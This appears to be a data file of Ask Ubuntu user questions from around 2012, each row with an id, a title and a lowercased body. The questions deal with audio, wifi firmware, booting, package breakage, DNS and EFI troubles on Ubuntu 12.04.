149997	multiple audio issues	i am having issues with my audio on ubuntu 12.04 , i will try and give as much detail as possible so sorry if there 's too much detail . the problem audio plays from both speakers and headphone regardless of what connector i choose and regardless of the profile i use . the microphone is constantly being played through headphones & speakers . the headphone audio is extremely quiet but plays from both ears when i select `` headphones '' for the connector in sound settings . the headphone audio only plays from one ear and is quiet ( but not as quiet as above ) when i select `` analogue output '' for the connector in sound settings . i can only select `` headphones '' as the connector in sound settings if i set the profile to either `` analogue stereo output/duplex '' , all others only allow me to choose `` analogue output '' for the connector . despite the headphone sound issues , the speaker sound is fine apart from the fact that i am not able to select which output is used , they just both play . my headphone and microphone are plugged into the front and my speakers are plugged into the back . what i have tried i have put everything in alsamixer to 100 apart from `` front mic boost '' which i have set to 0 . command output aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : ad198x headphone [ ad198x headphone ] subdevices : 1/1 subdevice # 0 : subdevice # 0 arecord -l **** list of capture hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 2/3 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xf7ff8000 irq 70 cat /proc/asound/modules 0 snd_hda_intel cat /proc/asound/card*/codec* | grep `` codec '' codec : analog devices ad1989b cat /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 hopefully i have provided enough information , i will happily provide anymore information needed . thank you . update reinstalling alsa-base and pulseaudio fixed the headphone issues i was having .
149999	how do i install missing firmware ?	i recently let a friend borrow my hp mini and he put ubuntu 12.04 on it . i do n't know what ubuntu is and i have no clue how to use it . when i try to connect to wifi it says wireless networks device not ready ( firmware missing ) . i have a wireless connection in my home and i 've never had a problem connecting to it . how do i install the firmware ? i 've never used ubuntu before so i need basic instructions .
150000	live cd does n't boot correctly !	i just tried to reinstall my ubuntu 12.04 system so i put in my live-cd ( 64bit ) and did a reboot . then my computer detects it and it wants to boot from it . shortly you can see two lines of text and then it stucks on a blackscreen . in the top left corner you can see a `` command-line '' courser . a courser as it can be seen in the virtual terminal of ubuntu ( ctrl+alt+f1 ) .
150001	better bible application software ( the word/e-sword replacement )	due to being un content of bible software in linux , two years ago i decided to code my own . unfortunately many commitments development was stalled at early stages and still struggling . in windows i have the word and it is doing excellent . there is also e-sword which is excellent also . but in linux the better i could find so far is xiphos which is to be honest have ugly interface . though it have powerful search capability it is lacking many features . after bad experience with wine i want to avoid it at all costs so it is not option to run tw over wine . is there any bible study software for linux with dictionaries , commentaries , books and bibles like tw with at least better interface . it should also be native in unity/gnome
150002	should i copy mp3s to usb ?	i am using 12.04 . would my laptop battery last longer if i copy my .mp3 files to a usb memory stick , then play them from there rather than from the hdd ? thanks , dennis
150005	is it a good idea to install different versions of ubuntu accomplishments on different computers ?	on my laptop , i have ubuntu accomplishments 0.1 , installed from the stable ppa . on my desktop , i have ubuntu accomplishments 0.2 , installed from the daily ppa . given the fact that they synchronize information through ubuntu one , may there be any kind of conflict ? or on the contrary , is it retro-compatible ? what should be my default behaviour with such apps that synchronize information on ubuntu one ? â for example for nitro tasks on any other ?
150008	how can i uninstall ubuntu ?	i have installed ubuntu netbook edition via a bootable-usb and upgraded ubuntu to 11.04 via network connection . i want to uninstall ubuntu and restore windows 7 starter but i can not find the partition . have i inadvertently deleted the partition ? i remember creating one before installing ubuntu but i can not seem to remember how i did so . how do i go about uninstalling it ? i have windows 7 starter on a cd - would it be usable if i created a botable usb with windows starter and restore my netbook ?
150009	run script at reboot	i would like to run this script everytime computer starts up . i 'm using crontab/gnome schduler : # ! /bin/bash while true do filename= $ ( inotifywait -e create /home/posto-11v/documents/processo | sed -r 's/^.*create ( , isdir ) *\s+ ( . * ) $ /\2/g ' ) zenity -- warning -- text= '' $ filename '' done this is the crontab -e file : @ reboot sh /home/posto-11v/documents/personaproject/programa/scripts/recebe_processo # job_id_9 i 've changed script permissions using chmod +x . i 'm not able to run it automatically , only by hand . what i 'm doing wrong ? can the script start whithout starting the terminal ? thks in advance !
150016	how to make an android phone use a wi-fi hotspot created on ubuntu	i want to know how to enable an android phone to detect the hotspot created under ubuntu so that the phone can use thse internet through it . i have learnt that android does not support ad-hoc.i tried changing the setting from ad-hoc to infrastructure..but still did not help.. any way i can do it ? through the system or any app ? ? thanx . : )
150021	ddrrescue error : ddrescue : ca n't open output file : not a directory	this is the output of sudo fdisk -l : ubuntu @ precisepangolin : ~ $ sudo fdisk -l disk /dev/sda : 164.7 gb , 164696555520 bytes 255 heads , 63 sectors/track , 20023 cylinders , total 321672960 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x886f6824 device boot start end blocks id system /dev/sda1 * 63 116117819 58058878+ 7 hpfs/ntfs/exfat /dev/sda2 116119550 319580159 101730305 f w95 ext 'd ( lba ) /dev/sda4 319580160 321671151 1045496 82 linux swap / solaris /dev/sda5 116119552 237807608 60844028+ 7 hpfs/ntfs/exfat /dev/sda6 237807616 319580159 40886272 83 linux disk /dev/sdc : 2000 mb , 2000682496 bytes 255 heads , 63 sectors/track , 243 cylinders , total 3907583 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x01fd25ac device boot start end blocks id system /dev/sdc1 * 63 3907582 1953760 c w95 fat32 ( lba ) ubuntu @ precisepangolin : ~ $ i tried those two commands : sudo ddrescue -r 3 /dev/sdc /dev/sda/imagefilename.img /dev/sda/textfilename.txt sudo ddrescue -r 3 /dev/sdc /dev/sda6/imagefilename.img /dev/sda6/textfilename.txt and got : ddrescue : ca n't open output file : not a directory and in other tryings i got : ddrescue : ca n't open input file : no such file or directory where is my mistake ? thanks ! if you need any more deatails i can give . any suggestion that my help is appreciated .
150022	problem with my cpu	i wanted to ask if this is normal : cpu ( s ) : 6.3 % us , 0.9 % sy , 0.0 % ni , 92.8 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st i typed `` top '' and got this result , i realise that only 1-2 cores are really working ... and my laptop gets hot of course ...
150025	acer d270 graphic support with gma3600	i have an acer d20 with an intel gma3600 card . is graphic acceleration for this card supported ? videos , flash , and other graphic intensive operations struggle with the current setup .
150028	`` you are not the owner ... '' message when trying to access folder	in the properties menu of this folder the permission is set to `` root '' user and group , it shows the message `` you are not the owner , so you can not change these permissions . '' i am indeed the owner and only user of the machine , how can i change the permissions ?
150036	anyone succeeded in using xmonad in ubuntu 12.04 ?	i have been trying hard to configure xmonad on my ubuntu 12.04 . will appreciate if someone sheds some light on installation , configuration and if one could also share the relevant files used in configuration !
150045	can not update system - stuck on zramswap-enabler	i 'm having the same problem as mentioned here on two computers ( one runs 12.04 , while the other runs 11.10 ) , but the solution provided does not work for me . when i do update and upgrade through the terminal , i get the following preconfiguring packages ... selecting previously unselected package zramswap-enabler . ( reading database ... 216245 files and directories currently installed . ) preparing to replace zramswap-enabler 0.2.1-0~19~precise1 ( using ... /zramswap-enabler_0.2.1-0~21~precise1_all.deb ) ... and then it simply stays like that . when i try to update using the update manager , i get a warning that not updates can be insalled and i need to do a partial upgrade . again , when i try to do the partial upgrade , the proces is simply stuck at the zramswap-enabler update . when i try to do as the solution mentioned above said , i get this : sudo dpkg -- remove -- force-remove-reinstreq zramswap-enabler dpkg : warning : overriding problem because -- force enabled : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . ( reading database ... 50 % ( reading database ... 216244 files and directories currently installed . ) removing zramswap-enabler ... and just like when i try to update , it simply stays stuck there .
150048	updating problems in 12.04	since i installed 12.04 i have problems with updating . i get lots of messages of the following kind : w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found [ ip : 141.30.13.30 80 ] somebody has an idea of what 's wrong ?
150057	how can i tell what version of java i have installed ?	i want to start toying around with java ( eventually getting to the point where i can write basic little programs for android or web ) , but i 've managed to have java messed up on my computer ( from past experiments ) . i 'm not sure which version of java i have , and would like to know if there is a command to see the version of java that is installed and active . also , which version works best ? all this on 32bit ubuntu 12.04 edit : ok , so it seems like i have both openjdk 6 and 7 , with openjdk 7 in use . i want to use openjdk 7 , so how do i uninstall openjdk 6 ? is just via usc good enough or is there a command that should be run ?
150066	split monitor in two	is there a way to split a single monitor in two , so that the two halves will be treated as separate monitors ? this means that windows should fill half the screen when maximized . also , gnome panels should fill half the screen .
150069	why dd is not a reliable command to write bootable .iso files to usb thumb drive ?	as the answers here indicate ubuntu .iso s are not expected to boot if copied with dd to a usb thumb drive . now my question is why is so that some linux distributions have the option to directly write their bootable .iso file to a thumb drive with dd but some ( read ubuntu ) have not ( for ubuntu i think it has to be converted to .img first ) . is it for some architectural difference in .isos ? or is it due to any limitation of dd itself ? i do n't know if it is off-topic here . i can move it to a more proper place if the community thinks so or suggests one . some explanation would be appreciable .
150077	can not uninstall myspell-he	i tried to install a hebrew spell checker for libreoffice . i downloaded a package named myspell-he_1.1-1_all.deb and tried to install it through the software center . installation failed and i can neither complete installation nor remove it . since then , whenever i run update manager i get an error message : the package system is broken . in details : the following packages have unmet dependencies : dictionaries-common : when i try to run the software center i get a pop-up window : items can not be installed or removed until the package catalog is repaired . a repair option is suggested . if i click it the following nessage appears : installarchives ( ) failed : dpkg : dependency problems prevent configuration of myspell-he : dictionaries-common ( 1.12.1ubuntu2 ) breaks myspell-he ( < = 1.1-1 ) and is installed . version of myspell-he to be configured is 1.1-1. dpkg : error processing myspell-he ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : myspell-he error in function : dpkg : dependency problems prevent configuration of myspell-he : dictionaries-common ( 1.12.1ubuntu2 ) breaks myspell-he ( < = 1.1-1 ) and is installed . version of myspell-he to be configured is 1.1-1. dpkg : error processing myspell-he ( -- configure ) : dependency problems - leaving unconfigured how can i clear this mess ?
150078	how often should i update my system ?	i just installed ubuntu and ran an update a few days ago . i am now seeing 400 some odd packages eligible for update in the notifications , and i am starting to be concerned about system bloat . does that make sense ? at any rate , i am looking for some guidance about how to keep the desktop/laptop update and trim . how often do you update the system ?
150080	install unity 4.0 in 12.04 ?	i recently upgraded to ubuntu 12.04 ( precise pangolin ) and find unity 5.0 unfamiliar and sluggish , so i would like to downgrade to unity 4.0 , that was included in ubuntu 11.10 ( oneiric ocelot ) . i ca n't find any working archives of unity 4.0 and i do n't know what to do anymore .
150081	how can i overwrite windows 7 with ubuntu ?	windows 7 runs unreasonably slow , so i decided to install ubuntu instead . i clicked install but it says that i do not have at least 4 . 4gb of disk space . but my hard disk 's capacity is is 320 gb . how can i fix this and get ubuntu installed ?
150082	how do i install ubuntu from usb pen drive	i 'm new to linux . i 'm using ubuntu 11.04 . now i want to install ubuntu 12.04 . i got an iso image of ubuntu 12.04 desktop . i put this image in to a pen drive which is formated , set the boot option boot from usb but nothing happened . i searched this over the net and on ubuntu website but nobody has given the complete steps . someone say you can install from the ubuntu also , someone says u can do a fresh installation from usb pen drive you need to make you pen drive bootable etc . etc . . my problem is that i do n't know the exact steps how ton install ubuntu from usb pen drive ? all i want to do is to completely remove my ubuntu 11.04 and install ubuntu 12.04 from usb pen-drive . can any body tell me how to make a pen drive bootable ? how to install ubuntu 12.04 from pen-drive ? please give me a step by step procedure with screenshots . thanx in advance
150084	kubuntu 12.04 - dns issues	starting yesterday ( 6/11/12 ) , i 've been having many network problems . when requesting a page in chrome , the page hangs on `` sending request '' and then will eventually timeout . i 'm within a vpn that has it 's own dns server . i 've tried to manually set my dns through the network-manager applet and by editing /etc/network/interfaces . having no luck i unlinked the resolv.conf file and dumped the contents of my old resolv.conf into it . again having no luck , i deactivated the dnsmasq server in /etc/networkmanager/networkmanager.conf by commenting out the dns=dnsmasq . $ cat networkmanager.conf [ main ] plugins=ifupdown , keyfile # dns=dnsmasq no-auto-default=d0:67 : e5 : ea : b6:6b , [ ifupdown ] managed=false $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : d0:67 : e5 : ea : b6:6b capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.254.122 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.254.2 dns : 192.168.254.1 what is strange is that the network will work fine for a few minutes then start to timeout . a few minutes later it will work again . i 'm unable to hit internal or external sites when it is timing out . when i $ dig local sites , i receive no answer . i do receive an answer from google.com . at this point , i would usually blame the dns server , especially since when i change to google 's dns server things work . but , i need to use our internal dns to hit our internal sites . nobody else is having issues and they are all using dhcp . this group includes one user who is using 11.04 . at this point , i 'm at a loss for what to do , so any help would be appreciated .
150085	how do i get brightness controls working properly on an eee pc 1001p ?	is there a solution to the low screen brightness issue with the eee pc 1001p and release 12.04 ? when i use the brightness control , the screen goes through three adjustment cycles of dark to semi bright , but never gets to bright . as you index the control up , brightness increases , then suddenly cuts back to dark . use the brightness button to further increase the brightness and the same cycle happens . as though there are three distinct brightness events , each one setting back to low level . under no circumstances other than initial boot up can you get to a bright screen . i just finished installing 12.04 on two acer ( gateway netbooks ) with no brightness issue . just on the eee pc 1001p eee pc model is 1001p
150086	ubuntu will not start due to full partitions	i left my computer downloading all the night and i did download 35 gb of movies ( legal ... ) . i restarted the computed in the morning then i booted in my encrypted windows partition for my work . i have left my computer downloading 35gb of files and when i restarted in the morning , i booted windows . when i tried to access ubuntu , it failed to boot and in low-graphic mode told me that it wo n't boot because the partition is full . i tried rescue and it reported 0 mb free . i also can not delete files with sudo rm as all are impossible due to a read-only file system . i can mount it in windows but there is a `` write protection '' there , also . should i try a live usb ?
150093	i am having problems booting after i installed ubuntu . how can i collect information to diagnose and fix the problem ?	after installing or updating ubuntu , i am having problems using grub to boot my computer . how do i collect information to determine what is wrong so that i can fix it ? note : this question and any answers to it is an attempt to publicly document a canonical answer as suggested in this stack exchange blog post .
150095	how to uninstall a firefox plugin ?	i was trying to play minecraft in the browser , and i got asked to install a plugin called `` icedtea-web plugin ( using icedtea-web 1.2 ( 1.2-2ubuntu1 ) ) '' ( something related to java 6 ) , which i can see now in tools > addons > plugins . there was another plugin to install ( for java 7 ) , i did n't know if i had to select one , so i just clicked install or accept . now the game or java app only shows a black screen , so i thought i should uninstall the plugin and try installing the other one . but there does n't seem to be a way to uninstall plugins through the firefox gui . any ideas ?
150096	change cinnamon panel icons	i recently installed cinnamon and noticed that as i change the gtk , cinnamon and icon themes , the panel icons remained the same . how can i change them to match my icon themes ? note that the battery icon is not part of my icon theme , it was like that from the start .
150097	pactl module-loopback loaded every time computer is turned on	the pactl module module-loopback is loaded every time i turn on my computer . i 'm not sure why , but i always have to use pactl unload-module 20 ( for some reason the module is always id 20 ) . is there somewhere i accidentally turned this on or some bash login script i accidentally put this in ? where can i look to resolve this ?
150100	extracting embedded images from a pdf	before i started using ubuntu i used nitro pdf reader to automatically extract images from pdf files . is there a pdf reader for linux that does this ? i would like to be able to extract images faster/easier than when taking a snapshot .
150101	is ubuntu 's gnome being updated ?	what i 'm wondering is this - is ubuntu-native gnome being updated ? i 'm asking because i notice a discrepancy - unity had a problem before in the new mail indicator staying blue if you read the message directly in thunderbird when it arrives instead of via clicking the indicator itself . this has been fixed in 12.04 from what i 've noticed . but transitioning to gnome returned this issue . will this fix be applied to gnome too , or has gnome been abandoned in terms of staying up to date ?
150102	ubuntu live cd start up error	first off , i 'm new to the linux scene . this is my first attempt to make a single boot installation for ubuntu . i tried it for a few days in dual boot with win7 and i was sold , so i removed the tumor my pc had to endure for so long ( sorry laptop ) and installed ubuntu from an usb boot device . my dual boot was as follows : windows 7 was installed on partition c from hdd1 , the windows installer for ubuntu installed ubuntu on partition i on that same hdd , hdd1 . in the live cd installation i did the normal execution for removing windows and it said that after the installation my partition would be 320gb big , that is the total size of my hdd , so i automatically assumed that it would format my whole hdd . now the installation has completed and it tells me to restart my system , and here comes the problem : now i get a dashing white cursor on my screen after the bios load and it wo n't budge ... it just stands there and it does n't move on or load ubuntu , the system gets very hot at this point ... then i tried to reinstall using the same live cd , it is still on my usb drive , but when i boot from the usb , i get the error : no such file with some address and the a grub rescue . what to do ? i can get hold of a win7 copy , but i do n't really want to use that crap again .
150104	ca n't get ubuntu to install [ 12.04 , 64bit ]	i 've been having quite an adventure trying to install ubuntu 12.04 64 bit edition . my computer has a core i5 2500k processor , 16gb of ram , and 500gb of hard drive space . i tried to install a few times with a bootable usb , but after hitting install i would be shown scrolling text which would eventually freeze and not allow me to do anything . i tried a couple of times making a new usb each time . ok i figured , maybe i got a bad download . i checked the md5 and it was not correct . i downloaded it again from the official download page , again a wrong md5 . i even downloaded it from the torrent link ( the alternate ) and again was given an incorrect md5 . at this point i checked my download of linux mint to see if maybe my md5 sum program was , somehow , wrong about my ubuntu downloads , and was given the correct md5 there . fwiw , the install of linux mint would freeze as well , even though it had a verified md5 . however it installed in a vm just fine . oh also , downloaded and created a live usb of 11.10 , verified md5 and all , and still no dice . any ideas ? my friend mentioned it could be the usb device at fault here . it is a pny flash drive . thanks in advance !
150105	how much memory ( ram ) should i allocate to the virtual machine ?	i 'm installing ubuntu in a virtual box ; my host os is windows 7 , and i have 6gb of ram on my system . one tutorial on setting up ubuntu on a virtual machine ( this one , on step 14 : http : //www.aztcs.org/meeting_notes/linuxsig/ubuntuintovirtualbox/ubuntuintovirtualbox.htm ) says to set the ram at 45 % of the total ram i have available , which would be about 2.7gb in my case . is this correct ? also , when i allocate ram to the vm , is that ram now reserved exclusively for the vm , and if yes , is it only reserved for the vm when the vm is running a guest os or does it create a permanent division in the ram , i.e. , when i stop running and quit from the virtual machine , will my host os ( windows 7 ) regain all 6gb of ram as its available ram ?
150122	how to create a unicode combination of keys by pressing one key ( simplify unicode adding )	i am trying to simplify the way i add unicode characters . at least to make them easier as in windows for ascii characters for new comers . right now for example to add the letter ă i have to press ctrl+shift+u and then type the unicode character 00d1 and then press space . what i want is to combine the ctrl+shift+u part into one press . for example , pressing a special key i do not use would trigger the ctrl+shift+u behaviour and i would just need to add the code part . how can i combine this 3 keys ( ctrl , shift , u ) into one , including the property of having to press them at the same time .
150123	what system information is useful in an emergency ?	i want to store a text file on ubuntu one containing command-line output in case of a system fault that stops me logging in or seeing my screen . that way i can retrieve the information on my phone if i need to ask for help on here from another system . i got the idea after seeing some questions on here about major faults that had some responders asking for more information such as ubuntu version , graphics card , what devices were connected and so on . it occurred to me that i would n't be able to answer those questions if i could n't access my system because i 'm not really a hardware guy and do n't retain that kind of information very well in my memory . so my question is : if i were to ask about a serious problem , such as no screen or ca n't log in at all , what command outputs would be most useful for you to see in order to help with my problem ?
150127	how do i install kde or xfce or lxde to an ubuntu 12.04 system with no internet connection ?	how do you install a desktop environment such as kde without an internet connection in ubuntu / linux mint ? i want to install kde 4.8.3 in ubuntu 12.04 lts without an internet connection ?
150131	how do i configure a flatron l177wsb for 1440x900 ?	i am using ubuntu 12.04 with nvidia geforce 6150sr graphic card.in 12.04 ubuntu does not recognize a screen resolution 1440x900 for my monitor `` flatron l177wsb '' .i tried this method , but not working.it fails from 5th step . terminal shows failed to get size of gamma for output default i am using amd athlon 64x2,1gb memory .
150135	how to block specific domains in hosts file ?	i know hot to block single tumblr blog with 127.0.1.1 something.tumblr.com but i want to block entire tumblr . i tried 127.0.1.1 tumblr.com but it 's not working . is there a way to do this ?
150139	how to make eclipse cdt 's linux gcc toolchain resolve c++ standard library headers ?	in ubuntu 12.04 lts i installed the eclipse cdt plugin and opened the new hello world project to just test everything out . when i was creating the project , i chose the only toolchain : `` linux gcc '' when the project is created , however , it says that # include < iostream > # include < cstdlb > are unresolved . thus , lines with cout and endl ca n't be used and it can not find std . using namespace std ; is also causing problems . how can i get my # include directives for standard library headers recognized , to support code using the std namespace ?
150141	what is `` manual package selection '' in ubuntu server ?	what does choosing `` manual package selection '' allow me to do , versus choosing one of the other options ?
150149	how to test 3d acceleration ?	i want to install and test 3d acceleration in ubuntu 12 . i have read these pages : https : //help.ubuntu.com/community/radeondriver https : //wiki.ubuntu.com/x/troubleshooting/videodriverdetection ? action=show & redirect=x % 2ftroubleshooting % 2ffglrxintefereswithradeondriver # problem : _need_to_purge_-fglrx i think i have installed it correctly , but i do n't know how to test it . i tried to play minecraft in the browser , but i got a black screen . it may be a java problem too , so i need to troubleshoot . so how can i test my video card and drivers ?
150154	what did i do wrong installing ubuntu ?	i just attempted to install ubuntu 12.04 on my other computer . i downloaded the .iso file , burned it to a disc , and booted from it . before i continue , i might add that i already have an os on this computer ( windows 7 ) and was attempting to install ubuntu alongside it . so , i selected my language , and clicked `` install ubuntu '' when the screen popped up . the window changed and said that i did n't have any operating system installed , what did i want to do ? it gave me the option to wipe the disk and install ubuntu , or `` something else . '' i clicked `` something else '' and setup two partitions on my hard disk for ubuntu , one for the system files and one for the swap area . these two partitions were created in win7 . i just changed the file systems and mounted one of them with `` / . '' then i clicked install , everything was going well , and then it said i had to restart my computer to use ubuntu . so i restarted , and then the windows logo appeared for a second , then it started the startup repair tool . so , i went through that , then restarted again . after the second restart , a screen popped up ( purple background , like ubuntu when it 's loading ) and there were a bunch of operating systems available . i chose ubuntu , and it loaded fine . so then i restarted and tried to start windows . it said there was a problem with windows and that i needed to insert my installation media . so i restarted ( pressed the power button ) . the bios loaded , then it was just a blank screen with a gray cursor like a cmd box in windows , except there was no text . nothing will load . what did i do wrong ? any help will be appreciated .
150157	how do i bypass `` do you want to ... '' dialog after clicking script when using unity ?	after i create a bash script and double click it in unity i am prompted with this - do you want to run `` kill launcher '' , or display its contents ? with run in terminal , dislpay , cancel and run as options . how can i get this window to disappear and default to run ?
150159	how to get a window from a remote box , command line only ?	i 've got a remote ubuntu box ( a linode ) that i need to run a java program which is not headless ( it has a gui window ) . i am having the worst time trying to get this to work . i do n't need a whole desktop , just a window . starting with a minimally installed ubuntu , can you recommend a lightweight strategy for doing this ?
150160	double-click does not open the default program	i installed ubuntu 12.04 , with texlive-full and texworks . when i double-click a .tex file in nautilus , it pops up a do you want to run `` xxxxxxxx.tex '' , or display it contents ? `` xxxxxxxx.tex '' is an executable text file . run in terminal display cancel run if i choose display , it opens texworks . how can i make it open without seeing the above conversation window ? by the way , is .tex file indeed an executable file ? added just for the case , my ~/.local/share/applications/mimeapps.list file looks like the following : [ default applications ] text/html=google-chrome.desktop x-scheme-handler/http=google-chrome.desktop x-scheme-handler/https=google-chrome.desktop x-scheme-handler/about=google-chrome.desktop x-scheme-handler/unknown=google-chrome.desktop text/x-tex=texworks.desktop x-scheme-handler/mailto=google-chrome.desktop [ added associations ] text/x-tex=texworks.desktop ; text/x-bibtex=jabref.desktop ; gedit.desktop ; i observe texworks are both up and down . should i remove one ? added this does not happen with all .tex files . in fact , i am currently using ubuntu 12.04 under virtual box with windows 7 host . i have my dropbox account synced with the windows 7 host , and i access files in dropbox in ubuntu through virtual box 's shared folder functionality . ( i did n't install dropbox client in ubuntu . ) files in dropbox are owned by root with group vboxsf . my personal account is in the group vboxsf . it seems that i have to uncheck the option for `` executable '' , but i have all my .tex files in the dropbox shared folder . would there be any workaround ?
150164	fresh install of 12.04 kernel panic	i am attempting to install ubuntu 12.04 on my computer . after the ubuntu splash screen , the computer throws up this error : sr 2:0:1:0 : [ sr0 ] unhandled error code kernel panic - not syncing : attempted to kill init ! pid : 1 , comm : run-init not tainted 3.2.0-23-generic # 36-ubuntu the computer hardware is as follows : core 2 quad 9400 , 8gb ram , gtx 275 , 3 mech hd , 2 ssd , win 7 install . i would like to dual boot ubuntu on this computer if possible . i did try placing this disk in my laptop and booted successfully which leads me to believe the fault lies with the desktop . under windows all hardware seems to work ok. any ideas ?
150166	change the brightness adjustment interval	so whenever i hit my dim/brighten keys on the keyboard , a notification bubble pops up with the screen brightness . all that 's fine , but i would like to be able to change how much the brightness changes with each key press . for example , right now it takes just 5 presses to go from the completely dark to the brightest setting . however , i know from the `` brightness/lock '' setting that the screen is capable of much smaller intervals than this . is there a way to change how much the brightness jumps each time the keys are pressed ?
150167	i want to install ubuntu 11.10 again . because my current ubuntu is not working correctly	i have installed ubuntu 11.10 on a windows 7 pc alongside windows 7 . but after some days it has problem . i want to re-install it . do i need to uninstall current ubuntu ?
150173	i want to install php 5.3.9 in ubuntu 12.04 via apt-get - what repository should i add ?	i want to install php 5.3.9 in ubuntu 12.04 via apt-get . apt-cache show php5-fpm only lists 5.3.10-1ubuntu3.1 and 5.3.10-1ubuntu3 . there is a critical bug in 5.3.10 ( https : //bugs.php.net/bug.php ? id=61045 & edit=1 ) that i am trying to avoid . is there a repository that will let me install php 5.3.9 in ubuntu 12.04 lts ?
150174	sony vaio with insyde h2o efi bios will not boot into grub efi	i bought a new sony vaio s series laptop . it uses insyde h2o bios efi , and trying to install linux on it is driving me crazy . root @ kubuntu : ~ # parted /dev/sda print model : ata hitachi hts72756 ( scsi ) disk /dev/sda : 640gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 274mb 273mb fat32 efi system partition hidden 2 274mb 20.8gb 20.6gb ntfs basic data partition hidden , diag 3 20.8gb 21.1gb 273mb fat32 efi system partition boot 4 21.1gb 21.3gb 134mb microsoft reserved partition msftres 5 21.3gb 342gb 320gb ntfs basic data partition 6 342gb 358gb 16.1gb ext4 basic data partition 7 358gb 374gb 16.1gb ntfs basic data partition 8 374gb 640gb 266gb ntfs basic data partition what is surprising is that there are 2 efi system partitions on the disk . the sda2 partition is a 20gb recovery partition which loads windows with a basic recovery interface . this is accessible by pressing the `` assist '' button as opposed to the normal power button . i presume that the sda1 efi system partition ( esp ) loads into this recovery . the sda3 esp has more fleshed out entries for microsoft windows , which actually goes into windows 7 ( as confirmed by bcdedit.exe on windows ) . ubuntu is installed on sda6 , and while installation i chose sda3 as my boot partition . the installer correctly created a sda3/efi/ubuntu/grubx64.efi application . the real problem : for the life of me , i ca n't set it to be the default ! i tried creating a sda3/startup.nsh which called grubx64.efi , but it did n't help -- on rebooting , the system still boots into windows . i tried using efibootmgr , and that shows as it it worked : root @ kubuntu : ~ # efibootmgr bootcurrent : 0000 bootorder : 0000,0001 boot0000* efi usb device boot0001* windows boot manager root @ kubuntu : ~ # efibootmgr -- create -- gpt -- disk /dev/sda -- part 3 -- write-signature -- label `` grub2 '' -- loader `` \\efi\\ubuntu\\grubx64.efi '' bootcurrent : 0000 bootorder : 0002,0000,0001 boot0000* efi usb device boot0001* windows boot manager boot0002* grub2 root @ kubuntu : ~ # efibootmgr bootcurrent : 0000 bootorder : 0002,0000,0001 boot0000* efi usb device boot0001* windows boot manager boot0002* grub2 however , on rebooting , as you guessed , the machine rebooted directly back into windows . the only things i can think of are : the sda1 partition is somehow being used overwrite /efi/boot/bootx64.efi and 